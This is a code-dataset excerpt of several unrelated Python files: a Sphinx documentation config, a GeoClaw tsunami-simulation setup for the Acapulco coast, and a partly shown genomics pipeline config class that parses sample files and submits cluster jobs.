Error! Duplicate letters found in alphabet: a e i o u
***
#**Challenge Credit:**
Based on the idea from /r/dailyprogrammer_ideas
[(Link to Challenge idea)] (http://www.reddit.com/r/dailyprogrammer_ideas/comments/1yjruf/intermediate_sort_me/)
with some minor tweaks from me.
Thanks to /u/BlackholeDevice for submitting the idea!
Good luck everyone and have fun!
"""
def main():
pass
if __name__ == "__main__":
main()
| DayGitH/Python-Challenges | DailyProgrammer/DP20140419B.py | Python | mit | 2,857 | [
"Galaxy"
] | 088eff27c9f58bdbef853d22f60b0534969b912cd08f4fd2cc3398443cb85e26 |
# -*- coding: utf-8 -*-
import sys
import os
import datetime
import sphinx_bootstrap_theme
import matplotlib as mpl
mpl.use("Agg")
# Sphinx needs to be able to import fatiando to use autodoc
sys.path.append(os.path.pardir)
from fatiando import __version__, __commit__
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.doctest',
'sphinx.ext.viewcode',
'sphinx.ext.extlinks',
'matplotlib.sphinxext.plot_directive',
'sphinx_gallery.gen_gallery',
]
from mayavi import mlab
mlab.options.offscreen = True
# Configure the sphinx-gallery plugin
sphinx_gallery_conf = {
'examples_dirs': ['../gallery'],
'gallery_dirs': ['gallery'],
'filename_pattern': os.sep + '*', # Match any .py file
'find_mayavi_figures': True,
}
# Configure the inline plots from matplotlib plot_directive
plot_formats = [("png", 90)]
plot_html_show_formats = False
plot_html_show_source_link = False
# Sphinx project configuration
templates_path = ['_templates']
exclude_patterns = ['_build']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
master_doc = 'index'
# General information about the project
year = datetime.date.today().year
project = u'Fatiando a Terra'
copyright = u'2010-{:d}, Leonardo Uieda'.format(year)
if len(__version__.split('-')) > 1 or __version__ == 'unknown':
version = 'dev'
else:
version = __version__
# I'll use the release to place the commit hash at the footer of the site
release = __commit__.split('-')[0] # Get rid of -dirty
doi = '10.6084/m9.figshare.1115194'
# These enable substitutions using |variable| in the rst files
rst_epilog = """
.. |doi| replace:: {doi}
.. |doilink| replace:: doi:`{doi} <http://dx.doi.org/{doi}>`__
.. |year| replace:: {year}
""".format(doi=doi, year=year)
html_last_updated_fmt = '%b %d, %Y'
html_title = 'Fatiando {}'.format(version)
html_short_title = 'Fatiando a Terra'
html_logo = '_static/fatiando-logo.png'
html_favicon = u'favicon.ico'
html_static_path = ['_static']
html_extra_path = ['.nojekyll', 'CNAME']
html_use_smartypants = True
pygments_style = 'default'
add_function_parentheses = False
# Custom sidebar templates, maps document names to template names.
html_sidebars = {
'install': ['localtoc.html'],
'develop': ['localtoc.html'],
'cookbook': ['localtoc.html'],
'changelog': ['localtoc.html'],
'api/**': ['localtoc.html'],
'gallery/index': ['localtoc.html'],
}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'FatiandoATerraDoc'
# Theme config
html_theme = 'bootstrap'
html_theme_path = sphinx_bootstrap_theme.get_html_theme_path()
html_theme_options = {
'bootswatch_theme': "flatly",
'navbar_title': 'fatiando',
'navbar_site_name': "Site",
'navbar_links': [
("Installing", "install"),
("Documentation", "docs"),
("Cookbook", "cookbook"),
("Gallery", "gallery/index"),
("Developer Guide", "develop"),
('<i class="fa fa-github-square fa-lg" title="Source code on Github"></i>',
"https://github.com/fatiando/fatiando", True),
],
# Render the next and previous page links in navbar. (Default: true)
'navbar_sidebarrel': False,
# Render the current pages TOC in the navbar. (Default: true)
'navbar_pagenav': False,
# Tab name for the current pages TOC. (Default: "Page")
'navbar_pagenav_name': "This page",
# Global TOC depth for "site" navbar tab. (Default: 1)
# Switching to -1 shows all levels.
'globaltoc_depth': 1,
# Include hidden TOCs in Site navbar?
# Note: If this is "false", you cannot have mixed ``:hidden:`` and
# non-hidden ``toctree`` directives in the same page, or else the build
# will break.
# Values: "true" (default) or "false"
'globaltoc_includehidden': "false",
# HTML navbar class (Default: "navbar") to attach to <div> element.
# For black navbar, do "navbar navbar-inverse"
'navbar_class': "navbar navbar-default",
# Fix navigation bar to top of page?
# Values: "true" (default) or "false"
'navbar_fixed_top': "false",
# Location of link to source.
# Options are "nav" (default), "footer" or anything else to exclude.
'source_link_position': "footer",
'bootstrap_version': "3",
}
| mtb-za/fatiando | doc/conf.py | Python | bsd-3-clause | 5,315 | [
"Mayavi"
] | 040348a1f9a7d3295a40f25834afd9e8c77ccdf3bfbb8f885d88a4535bae4f68 |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""
Module to set up run time parameters for Clawpack.
The values set in the function setrun are then written out to data files
that will be read in by the Fortran code.
"""
import os
import numpy
import clawpack.geoclaw.dtopotools as dtopo
#------------------------------
def setrun(claw_pkg='geoclaw'):
#------------------------------
"""
Define the parameters used for running Clawpack.
INPUT:
claw_pkg expected to be "geoclaw" for this setrun.
OUTPUT:
rundata - object of class ClawRunData
"""
from clawpack.clawutil import data
assert claw_pkg.lower() == 'geoclaw', "Expected claw_pkg = 'geoclaw'"
num_dim = 2
rundata = data.ClawRunData(claw_pkg, num_dim)
#------------------------------------------------------------------
# Problem-specific parameters to be written to setprob.data:
#------------------------------------------------------------------
#probdata = rundata.new_UserData(name='probdata',fname='setprob.data')
#------------------------------------------------------------------
# GeoClaw specific parameters:
#------------------------------------------------------------------
rundata = setgeo(rundata)
#------------------------------------------------------------------
# Standard Clawpack parameters to be written to claw.data:
# (or to amr2ez.data for AMR)
#------------------------------------------------------------------
clawdata = rundata.clawdata # initialized when rundata instantiated
# Set single grid parameters first.
# See below for AMR parameters.
# ---------------
# Spatial domain:
# ---------------
# Number of space dimensions:
clawdata.num_dim = num_dim
# Lower and upper edge of computational domain:
clawdata.lower[0] = -118.0 # west longitude
clawdata.upper[0] = -86.0 # east longitude
clawdata.lower[1] = 7.0 # south latitude
clawdata.upper[1] = 21.0 # north latitude
# Number of grid cells
res_factor = 1
clawdata.num_cells[0] = 32 * res_factor
clawdata.num_cells[1] = 14 * res_factor
# ---------------
# Size of system:
# ---------------
# Number of equations in the system:
clawdata.num_eqn = 3
# Number of auxiliary variables in the aux array (initialized in setaux)
clawdata.num_aux = 4
# Index of aux array corresponding to capacity function, if there is one:
clawdata.capa_index = 2
# -------------
# Initial time:
# -------------
clawdata.t0 = 0.0
# Restart from checkpoint file of a previous run?
# Note: If restarting, you must also change the Makefile to set:
# RESTART = True
# If restarting, t0 above should be from original run, and the
# restart_file 'fort.chkNNNNN' specified below should be in
# the OUTDIR indicated in Makefile.
clawdata.restart = False # True to restart from prior results
clawdata.restart_file = 'fort.chk00036' # File to use for restart data
# -------------
# Output times:
#--------------
# Specify at what times the results should be written to fort.q files.
# Note that the time integration stops after the final output time.
# The solution at initial time t0 is always written in addition.
clawdata.output_style = 2
if clawdata.output_style==1:
# Output nout frames at equally spaced times up to tfinal:
hours = 4
output_per_hour = 12
clawdata.num_output_times = hours * output_per_hour
clawdata.tfinal = float(hours) * 3600.0
clawdata.output_t0 = True # output at initial (or restart) time?
elif clawdata.output_style == 2:
# Specify a list of output times.
clawdata.output_times = [float(time) for time in xrange(0,250,25)]
acapulco_time_zoom = numpy.linspace(0.07, 0.2, 10) * 3600.0
for new_time in acapulco_time_zoom:
clawdata.output_times.append(new_time)
hours = 4
output_per_hour = 6
for time in numpy.linspace(0, hours * 3600, output_per_hour * hours + 1):
if time > clawdata.output_times[-1]:
clawdata.output_times.append(float(time))
elif clawdata.output_style == 3:
# Output every iout timesteps with a total of ntot time steps:
clawdata.output_step_interval = 1
clawdata.total_steps = 3
clawdata.output_t0 = True
clawdata.output_format = 'binary' # 'ascii' or 'netcdf'
clawdata.output_q_components = 'all' # need all
clawdata.output_aux_components = 'none' # eta=h+B is in q
clawdata.output_aux_onlyonce = False # output aux arrays each frame
# ---------------------------------------------------
# Verbosity of messages to screen during integration:
# ---------------------------------------------------
# The current t, dt, and cfl will be printed every time step
# at AMR levels <= verbosity. Set verbosity = 0 for no printing.
# (E.g. verbosity == 2 means print only on levels 1 and 2.)
clawdata.verbosity = 3
# --------------
# Time stepping:
# --------------
# if dt_variable==1: variable time steps used based on cfl_desired,
# if dt_variable==0: fixed time steps dt = dt_initial will always be used.
clawdata.dt_variable = True
# Initial time step for variable dt.
# If dt_variable==0 then dt=dt_initial for all steps:
clawdata.dt_initial = 2.
# Max time step to be allowed if variable dt used:
clawdata.dt_max = 1e+99
# Desired Courant number if variable dt used, and max to allow without
# retaking step with a smaller dt:
clawdata.cfl_desired = 0.75
clawdata.cfl_max = 1.0
# Maximum number of time steps to allow between output times:
clawdata.steps_max = 5000
# ------------------
# Method to be used:
# ------------------
# Order of accuracy: 1 => Godunov, 2 => Lax-Wendroff plus limiters
clawdata.order = 2
# Use dimensional splitting? (not yet available for AMR)
clawdata.dimensional_split = 'unsplit'
# For unsplit method, transverse_waves can be
# 0 or 'none' ==> donor cell (only normal solver used)
# 1 or 'increment' ==> corner transport of waves
# 2 or 'all' ==> corner transport of 2nd order corrections too
clawdata.transverse_waves = 2
# Number of waves in the Riemann solution:
clawdata.num_waves = 3
# List of limiters to use for each wave family:
# Required: len(limiter) == num_waves
# Some options:
# 0 or 'none' ==> no limiter (Lax-Wendroff)
# 1 or 'minmod' ==> minmod
# 2 or 'superbee' ==> superbee
# 3 or 'mc' ==> MC limiter
# 4 or 'vanleer' ==> van Leer
clawdata.limiter = ['mc', 'mc', 'mc']
clawdata.use_fwaves = True # True ==> use f-wave version of algorithms
# Source terms splitting:
# src_split == 0 or 'none' ==> no source term (src routine never called)
# src_split == 1 or 'godunov' ==> Godunov (1st order) splitting used,
# src_split == 2 or 'strang' ==> Strang (2nd order) splitting used, not recommended.
clawdata.source_split = 'godunov'
# --------------------
# Boundary conditions:
# --------------------
# Number of ghost cells (usually 2)
clawdata.num_ghost = 2
# Choice of BCs at xlower and xupper:
# 0 => user specified (must modify bcN.f to use this option)
# 1 => extrapolation (non-reflecting outflow)
# 2 => periodic (must specify this at both boundaries)
# 3 => solid wall for systems where q(2) is normal velocity
clawdata.bc_lower[0] = 'extrap'
clawdata.bc_upper[0] = 'extrap'
clawdata.bc_lower[1] = 'extrap'
clawdata.bc_upper[1] = 'extrap'
# Specify when checkpoint files should be created that can be
# used to restart a computation.
clawdata.checkpt_style = 1
if clawdata.checkpt_style == 0:
# Do not checkpoint at all
pass
elif clawdata.checkpt_style == 1:
# Checkpoint only at tfinal.
pass
elif clawdata.checkpt_style == 2:
# Specify a list of checkpoint times.
clawdata.checkpt_times = [0.1,0.15]
elif clawdata.checkpt_style == 3:
# Checkpoint every checkpt_interval timesteps (on Level 1)
# and at the final time.
clawdata.checkpt_interval = 5
# ---------------
# AMR parameters:
# ---------------
amrdata = rundata.amrdata
# max number of refinement levels:
amrdata.amr_levels_max = 7
# List of refinement ratios at each level (length at least mxnest-1)
# Level 1 - (1.0º,1.0º) - (100950.057205 m,110772.872596 m)
# Level 2 - (0.25º,0.25º) - (25237.5143013 m,27693.2181489 m)
# Level 3 - (0.125º,0.125º) - (12618.7571506 m,13846.6090744 m)
# Level 4 - (0.0625º,0.0625º) - (6309.37857532 m,6923.30453722 m)
# Level 5 - (0.0104166666667º,0.0104166666667º) - (1051.56309589 m,1153.88408954 m)
# Level 6 - (0.00130208333333º,0.00130208333333º) - (131.445386986 m,144.235511192 m)
# Level 7 - (8.13802083333e-05º,8.13802083333e-05º) - (8.21533668662 m,9.01471944951 m))
amrdata.refinement_ratios_x = [4,2,2,6,8,8]
amrdata.refinement_ratios_y = [4,2,2,6,8,8]
amrdata.refinement_ratios_t = [4,2,2,6,8,8]
# Specify type of each aux variable in amrdata.auxtype.
# This must be a list of length maux, each element of which is one of:
# 'center', 'capacity', 'xleft', or 'yleft' (see documentation).
amrdata.aux_type = ['center','capacity','yleft','center']
# Flag using refinement routine flag2refine rather than richardson error
amrdata.flag_richardson = False # use Richardson?
amrdata.flag2refine = True
# steps to take on each level L between regriddings of level L+1:
amrdata.regrid_interval = 3
# width of buffer zone around flagged points:
# (typically the same as regrid_interval so waves don't escape):
amrdata.regrid_buffer_width = 2
# clustering alg. cutoff for (# flagged pts) / (total # of cells refined)
# (closer to 1.0 => more small grids may be needed to cover flagged cells)
amrdata.clustering_cutoff = 0.700000
# print info about each regridding up to this level:
amrdata.verbosity_regrid = 0
# ----- For developers -----
# Toggle debugging print statements:
amrdata.dprint = False # print domain flags
amrdata.eprint = False # print err est flags
amrdata.edebug = False # even more err est flags
amrdata.gprint = False # grid bisection/clustering
amrdata.nprint = False # proper nesting output
amrdata.pprint = False # proj. of tagged points
amrdata.rprint = False # print regridding summary
amrdata.sprint = False # space/memory output
amrdata.tprint = True # time step reporting each level
amrdata.uprint = False # update/upbnd reporting
# More AMR parameters can be set -- see the defaults in pyclaw/data.py
# ---------------
# Regions:
# ---------------
rundata.regiondata.regions = []
rundata.regiondata.regions.append([7,7,0.0,1e10, -99.930021, -99.830477, 16.780640, 16.870122])
# to specify regions of refinement append lines of the form
# [minlevel,maxlevel,t1,t2,x1,x2,y1,y2]
# Region Long (E) Lat (N)
# Acapulco -99º 52' 41.10" 16º 50' 18.19"
#rundata.regiondata.regions.append([1, 6, 0.0, 1e10,
# -100.1, -99.66666667,
# 16.7, 16.96666667])
# Ixtapa-Zihuatanejo -101º 33' 8.61" 17º 38' 15.15"
# Puerto Angel -96º 29' 35.08" 15º 39' 53.28"
# Lázaro Cárdenas -102º 9' 54.86" 17º 55' 30.66"
#rundata.regiondata.regions.append([1, 6, 0.0, 1e10,
# -102.2440361, -102.0918583,
# 17.89015556, 17.99216667])
# ---------------
# Gauges:
# ---------------
degminsec2dec = lambda deg, minutes, seconds: float(deg) + (float(minutes) + float(seconds) / 60.0) / 60.0
rundata.gaugedata.gauges = []
# for gauges append lines of the form [gaugeno, x, y, t1, t2]
# ID Location Name Lat Long
# 1 Manzanillo, Col. 19º 3.4 N 104º 19.1 W
# rundata.gaugedata.gauges.append([1, -104.3183333, 19.05666667, 0.0, 1.e10])
# 2 Ixtapa, Gro. 17º 40.1 N 101º 38.7 W
# rundata.gaugedata.gauges.append([2, -101.645, 17.66833333, 0.0, 1.e10])
# 3 Zihuatanejo, Gro. 17º 38.2 N 101º 33.5 W
# rundata.gaugedata.gauges.append([3, -101.5583333, 17.63666667, 0.0, 1.e10])
# 4 Acapulco, Gro. 16º 50.3 N 99º 54.2 W
rundata.gaugedata.gauges.append([4, -99.90333333, 16.83833333, 0.0, 1.e10])
# 5 Isla Socorro, Col. 18º 43.5 N 110º 57.0 W
# rundata.gaugedata.gauges.append([5, -110.95, 18.725, 0.0, 1.e10])
# 6 Puerto Angel, Oax 15º 40 N 96º 29.5 W
# rundata.gaugedata.gauges.append([6, -degminsec2dec(96,29.5,0), degminsec2dec(15,40,0), 0.0, 1.e10])
# 7 Salina Cruz, Oax. 16º 19.1 N 95º 11.8 W
rundata.gaugedata.gauges.append([7, -degminsec2dec(95,11.8,0), degminsec2dec(16,19.1,0.0), 0.0, 1.e10])
# 8 Puerto Madero, Chis 14º 42.7 N 92º 24.1 W
# rundata.gaugedata.gauges.append([8, -degminsec2dec(92,24.1,0), degminsec2dec(14,42.7,0), 0.0, 1.e10])
# 9 Lazaro Cardenas, Mich 17º 56.4 N 102º 10.7 W
# rundata.gaugedata.gauges.append([9, -degminsec2dec(102,10.7,0.0), degminsec2dec(17,56.4,0.0), 0.0, 1.e10])
# 10 Huatulco 15° 45'.2 N 96° 07'.8 W
# rundata.gaugedata.gauges.append([10, -degminsec2dec(96,7.8,0.0), degminsec2dec(15,45.2,0.0), 0.0, 1.e10])
# 11 Acapulco 16°51'9.00"N 99°52'50"W
rundata.gaugedata.gauges.append([11, -degminsec2dec(99,52,50), degminsec2dec(16,51,9), 0.0, 1.e10])
# 12 Acapulco additional gauges
rundata.gaugedata.gauges.append([12, -99.904294, 16.839721, 0.0, 1.e10])
rundata.gaugedata.gauges.append([13, -99.905197, 16.840743, 0.0, 1.e10])
rundata.gaugedata.gauges.append([14, -99.903940, 16.842113, 0.0, 1.e10])
rundata.gaugedata.gauges.append([15, -99.902489, 16.843462, 0.0, 1.e10])
rundata.gaugedata.gauges.append([16, -99.898397, 16.845365, 0.0, 1.e10])
rundata.gaugedata.gauges.append([17, -99.891848, 16.851036, 0.0, 1.e10])
rundata.gaugedata.gauges.append([18, -99.860943, 16.848830, 0.0, 1.e10])
rundata.gaugedata.gauges.append([19, -99.856680, 16.839136, 0.0, 1.e10])
rundata.gaugedata.gauges.append([20, -99.888627, 16.816910, 0.0, 1.e10])
return rundata
# end of function setrun
# ----------------------
#-------------------
def setgeo(rundata):
#-------------------
"""
Set GeoClaw specific runtime parameters.
For documentation see ....
"""
try:
geo_data = rundata.geo_data
except:
print "*** Error, this rundata has no geo_data attribute"
raise AttributeError("Missing geo_data attribute")
# == Physics ==
geo_data.gravity = 9.81
geo_data.coordinate_system = 2
geo_data.earth_radius = 6367.5e3
# == Forcing Options
geo_data.coriolis_forcing = False
# == Algorithm and Initial Conditions ==
geo_data.sea_level = 0.0
geo_data.dry_tolerance = 1.e-3
geo_data.friction_forcing = True
geo_data.manning_coefficient = [0.03, 0.025]
geo_data.manning_break = [0.0]
geo_data.friction_depth = 1e6
# Refinement settings
refinement_data = rundata.refinement_data
refinement_data.variable_dt_refinement_ratios = True
refinement_data.wave_tolerance = 0.25
refinement_data.deep_depth = 200.0
refinement_data.max_level_deep = 5
# == settopo.data values ==
topo_data = rundata.topo_data
# for topography, append lines of the form
# [topotype, minlevel, maxlevel, t1, t2, fname]
topo_data.topofiles.append([3, 1, 5, 0., 1.e10,
os.path.abspath('./bathy/mexican_coast_pacific.tt3')])
# topo_data.topofiles.append([3, 6, 7, 0., 1.e10,
# os.path.abspath('./bathy/acapulco_projected_30m.tt2')])
topo_data.topofiles.append([2, 5, 7, 0., 1.e10,
os.path.abspath('./bathy/new_bathy/new_acapulco_bathy.tt2')])
# topo_data.topofiles.append([3, 1, 10, 0., 1.e10,
# os.path.abspath('./bathy/srtm_subsection.tt3')])
# == setdtopo.data values ==
dtopo_data = rundata.dtopo_data
# for moving topography, append lines of the form :
# [topotype, minlevel,maxlevel,fname]
dtopo_data.dtopofiles.append([1, 5, 5, 'bathy/rot_gapSvr1zvT.xyzt'])
#dtopo_data.dtopofiles.append([3, 5, 5, 'okada_1957Sm_du370.tt3'])
# subfault = dtopo.SubFault(units={"slip":"cm", "dimensions":"km", "depth":"km"})
# subfault.coordinates = [-99.25, 16.6]
# subfault.coordinate_specification = 'top center'
# subfault.slip = 200
# subfault.rake = 90.0
# subfault.strike = 296
# subfault.dip = 15.0
# subfault.depth = 4.0
# subfault.dimensions = (320.0, 80.0)
# subfault.my = 5e11
# subfault.write('./dtopo.tt3')
# dtopo_data.dtopofiles.append([3,5,5,'dtopo.tt3'])
# Note that if the run_faults.py script is used this is overriden there
# == setqinit.data values ==
rundata.qinit_data.qinit_type = 0
rundata.qinit_data.qinitfiles = []
# for qinit perturbations, append lines of the form: (<= 1 allowed for now!)
# [minlev, maxlev, fname]
# == setfixedgrids.data values ==
fixed_grids = rundata.fixed_grid_data
# for fixed grids append lines of the form
# [t1,t2,noutput,x1,x2,y1,y2,xpoints,ypoints,\
# ioutarrivaltimes,ioutsurfacemax]
# == fgmax.data values ==
fgmax_files = rundata.fgmax_data.fgmax_files
# for fixed grids append to this list names of any fgmax input files
# fgmax_files.append(os.path.abspath(os.path.join(os.getcwd(),'fgmax_grid.txt')))
return rundata
# end of function setgeo
# ----------------------
if __name__ == '__main__':
# Set up run-time parameters and write all data files.
import sys
rundata = setrun(*sys.argv[1:])
rundata.write()
| mandli/compsyn-geoclaw | setrun.py | Python | mit | 18,786 | [
"NetCDF"
] | 5b213ec177a82231e9ed16640b5ff9447c1164a3c841826f72380ee472436857 |
import csv
import yaml
import os
import glob
from pprint import pprint as pp
from utils import *
from constants import *
from logs import *
from seq_utils import *
from subprocess import Popen, PIPE
class config:
"""
Class for handling config set up.
"""
def __init__(self, config):
self.config_filename = config
self.config_name = config.replace(".yaml", "")
try:
self.config = yaml.load(open(config, 'r'))
except:
msg("Sample File not found", "error")
script_dir = os.path.dirname(os.path.realpath(__file__)).replace("/utils", "")
self.node_index = 0
# Set up Logs
self.general_log = general_log(self)
self.command_log = command_log(self)
# Options that are required within the config file.
self.reqd_options = ["reference",
"fastq_dir",
"bam_dir",
"log_dir",
"sample_file",
"chrom_chunk_kb",
"cores"]
# Check that required options are defined
for option in self.reqd_options:
undefined_options = []
for option in self.reqd_options:
if option not in self.config["OPTIONS"].keys():
undefined_options.append(option)
if undefined_options:
undefined_options = ', '.join(undefined_options)
analysis_filename = os.path.split(self.config_filename)[1]
msg("You must define OPTION(s) %s in %s" % (undefined_options, analysis_filename), "error")
# Set Options as base; for directories
for k, i in self.config["OPTIONS"].items():
setattr(self, k, i)
if k.endswith("dir") and k != "fastq_dir":
makedir(i)
# Set Commands as base directories
for analysis, values in self.config["COMMANDS"].items():
setattr(self, analysis, dotdictify(values))
for command, params in values.items():
#setattr(self, command, dotdictify(params))
if command in tools:
# Generate command options
opts = self.format_command_options(params)
analysis_attr = getattr(self, analysis)
setattr(analysis_attr, command + "_options", opts)
setattr(self, analysis, analysis_attr)
# Setup command info
self.cmd = dotdictify(self.config["COMMANDS"])
# Set up entity-attribute-value
self.eav = EAV()
self.eav.file = self.config_name + ".eav.txt"
# snp callers
self.snp_callers = [x for x in self.cmd.snps if x in available_snp_callers]
# Setup union variant sets (for SNP and INDEL)
self.union_variants = dotdictify()
for caller in self.snp_callers:
for variant_type in ["ALL","SNP", "INDEL"]:
self.union_variants[caller][variant_type] = "{self.config_name}.{variant_type}.{caller}.union_variants.txt".format(**locals())
# Setup Reference Here
ref_dir = "{script_dir}/genomes/{self.reference}/*f*.gz".format(**locals())
try:
self.reference_file = glob.glob(ref_dir)[0]
assert(file_exists(self.reference_file))
except:
msg("Reference file '%s' does not exist" % (self.reference), "error")
def log(self, msg, analysis_type=""):
""" Adds to the log file for a given analysis. """
self.general_log.add(msg, analysis_type)
def command(self, command):
""" Runs a command in the shell and logs that it was run. """
out = Popen(command, shell=True, stdout=PIPE, stderr=None)
for line in out.stdout:
print(line)
if out.stderr is not None:
raise Exception(out.stderr)
def format_command_options(self, command_config):
"""
Performs standard formatting of commands being run.
"""
opts = ""
if command_config is not None:
for k, v in command_config.items():
# Use '__' for custom options
if k.startswith("__"):
pass
# Use '_' to designate flags.
elif k.startswith("_"):
opts += " %s " % v
else:
opts += "%s %s " % (k, v)
return opts
else:
return ""
def get_node():
self.node_index += 1
return str(self.nodes[node_index % len(self.nodes)])
def submit_job(self,
command,
analysis_type,
log_name,
dependencies=None,
dependency_type="afterok"):
""" Submit a job to the cluster """
# Insert dependencies, output_dir, and nodes
if LOCAL is False:
self.log(command, "sbatch")
command = command.split(" ")
# Output Dirs
log_file = "{self.log_dir}/{analysis_type}.{log_name}.%N.%j".format(**locals())
output_dirs = " --output={log_file}.txt --error={log_file}.err ".format(**locals())
# Node
if hasattr(self, "nodes"):
use_node = "--nodelist={node} ".format(node="node" + get_node())
command.insert(1, use_node)
# Dependencies
if dependencies is not None:
if len(dependencies) > 0:
dependencies = ':'.join(dependencies)
depends_on = " --dependency={dep_type}:".format(**locals())
depends_on += dependencies
else:
depends_on = ""
command.insert(1, depends_on)
else:
depends_on = ""
print command
command = ' '.join(command)
jobid, err = Popen(command, stdout=PIPE, stderr=PIPE, shell=True).communicate()
jobid = jobid.strip().split(" ")[-1]
print("Submitted job [{jobid}:{analysis_type}:{log_name}]".format(**locals()))
if dependencies is not None:
print("Dependencies: {dependencies}".format(dependencies=', '.join(dependencies)))
if jobid.isdigit() is False:
raise Exception("Error submitting %s" % jobid)
exit()
else:
return jobid
else:
self.log(command, "python")
self.command(command)
def get_sample_file(self):
"""
Returns the sample file object
"""
return sample_file(self.sample_file, self)
def chunk_genome(self):
"""
Parses bwa .ann file to retrieve chromosome sizes
for chunking purposes
"""
ann = open(self.reference_file + ".ann").read()
# Parsing .ann files
contigs = [x.split(" ")[1] for x in ann.split("\n")[1:-1:1]][::2]
contig_sizes = map(int, [x.split(" ")[1] for x in ann.split("\n")[1:-1:1]][1::2])
chunk_size = self.chrom_chunk_kb * 1000
chunk_set = []
for chrom, size in zip(contigs, contig_sizes):
for chunk in xrange(1, size, chunk_size):
if chunk + chunk_size > size:
chunk_end = size
else:
chunk_end = chunk + chunk_size-1
chunk_set.append("{chrom}:{chunk}-{chunk_end}".format(**locals()).strip())
return chunk_set
def get_non_uniq(non_uniq_list):
non_uniq_list = list(set([x for x in non_uniq_list if non_uniq_list.count(x) > 1]))
if len(non_uniq_list) > 0:
return non_uniq_list
else:
return None
class sample_file:
"""
Class for handling actions associated with the sample file:
"""
def __init__(self, filename, config):
self.filename = filename
self.config = config
self.sample_file_vars = ["FQ1", "FQ2", "ID", "LB", "SM"]
# If the sample file exists, don't attempt to open it.
if not file_exists(filename):
return None
self.sample_file = open(filename, 'rU')
# Define Sets
self.fastq_set = []
self.ID_set = [] # Used with Individual Bam Set.
self.SM_Group_set = dotdictify() # Tracks bams (by ID) belonging to a sample.
self.fq_set = []
with self.sample_file as f:
iter_csv = csv.DictReader(f, delimiter='\t', quoting=csv.QUOTE_NONE)
for line, row in enumerate(iter_csv):
# 1-based index
line += 1
row["line"] = line
# Track IDs
ID = row["ID"]
SM = row["SM"]
self.ID_set.append(ID)
# set fq names.
fq1, fq2 = row["FQ1"], row["FQ2"]
fq_pair = tuple(config.fastq_dir + "/" + x for x in [fq1, fq2])
# save fq pair
row["fq_pair"] = fq_pair
fq_exists = map(file_exists, fq_pair)
self.fastq_set.append(fq_pair)
empty_vals = [x for x in self.sample_file_vars if not row[x]]
# Run basic checks
if row["FQ1"] == row["FQ2"]:
msg(
"Both Fastq's share same name on line %s in %s: %s" % (line, self.filename, fq1), "error")
elif row["SM"] == row["ID"]:
msg(
"Sample Name and Sample ID can not be the same in %s [line %s - %s]" %
(self.filename, line, row["ID"]), "error")
elif len(empty_vals) > 0:
empty_vals = ','.join(empty_vals)
msg("Missing values on line %s of %s: %s" % (line, self.filename, empty_vals), "error")
elif not all(fq_exists):
missing_fastq = ','.join([fq_pair[x] for x in range(0, 2) if not fq_exists[x]])
msg(
"Fastq(s) Missing on line %s in %s: %s" % (line, self.filename, missing_fastq), "error")
if not row["PL"]:
row["PL"] = "ILLUMINA"
# Construct a dictionary for read group for comparisons
RG = dict([(k, v) for k, v in row.items() if k in ("ID", "LB", "SM", "PL",)])
# Also Construct Raw Read Group (for aligning)
rg_dat = [k + ":" + v for k, v in RG.items()]
raw_RG = r"@RG\t" + r'\t'.join(sorted(rg_dat))
bam_ind_filename = config.bam_dir + "/" + row["ID"] + ".bam"
bam_merged_filename = config.bam_dir + "/" + row["SM"] + ".bam"
row["RG"] = RG
row["raw_RG"] = raw_RG
row["bam_ind_filename"] = bam_ind_filename
row["bam_merged_filename"] = bam_merged_filename
# Group IDs and Samples by Read Group
if SM not in self.SM_Group_set:
self.SM_Group_set[SM] = {"ID": [],
"RG": [],
"fq": [],
"raw_RG": [],
"bam_ind_filename": []}
self.SM_Group_set[SM]["ID"].append(ID)
self.SM_Group_set[SM]["RG"].append(RG)
self.SM_Group_set[SM]["SM"] = SM
self.SM_Group_set[SM]["RG"] = sorted(self.SM_Group_set[SM]["RG"])
self.SM_Group_set[SM]["fq"].append(fq_pair)
self.SM_Group_set[SM]["raw_RG"].append(raw_RG)
self.SM_Group_set[SM]["bam_ind_filename"].append(bam_ind_filename)
self.SM_Group_set[SM]["bam_merged_filename"] = bam_merged_filename
# Add vcf files
self.SM_Group_set[SM]["vcf_files"] = {}
for caller in config.snp_callers:
for call_type in ["individual", "union"]:
for variant_type in ["ALL","SNP", "INDEL", "SV", "CNV", "TRANSPOSON"]:
vcf_ind = "{config.vcf_dir}/{SM}.{variant_type}.{caller}.{call_type}.vcf.gz".format(**locals())
self.SM_Group_set[SM]["vcf_files"][caller + "_" + call_type][variant_type] = vcf_ind
# Remove keys incorporated into RG
del row["LB"]
del row["PL"]
del row["SM"]
# If all checks passed, append row dictionary
self.fq_set.append(row)
# Check that all IDs are uniq
non_uniq_IDs = get_non_uniq(self.ID_set)
if get_non_uniq(self.ID_set):
raise Exception(
"Non-uniq IDs exist: %s" % ', '.join(non_uniq_IDs))
# Check that all fastq sets are uniq
non_uniq_fastq_set = get_non_uniq(self.fastq_set)
if non_uniq_fastq_set:
raise Exception(
"Non-uniq Fastqs exist: %s" % ', '.join(non_uniq_fastq_set[0]))
def new_sample_file(self):
"""
Generates a new sample file from a directory
"""
header = '\t'.join(self.sample_file_vars + ["RUN\n"])
sample_filename = self.filename
if is_dir(sample_filename):
msg("Sample file is a directory", "error")
new_sample_file = open(sample_filename, 'w')
new_sample_file.write(header)
sample_set = sorted(glob.glob(self.config.fastq_dir + "/*.fq.gz"))
fastq_pairs = zip(sorted([os.path.split(x)[1] for x in sample_set if x.find("1.fq.gz") != -1]),
sorted([os.path.split(x)[1] for x in sample_set if x.find("2.fq.gz") != -1]))
for pair in fastq_pairs:
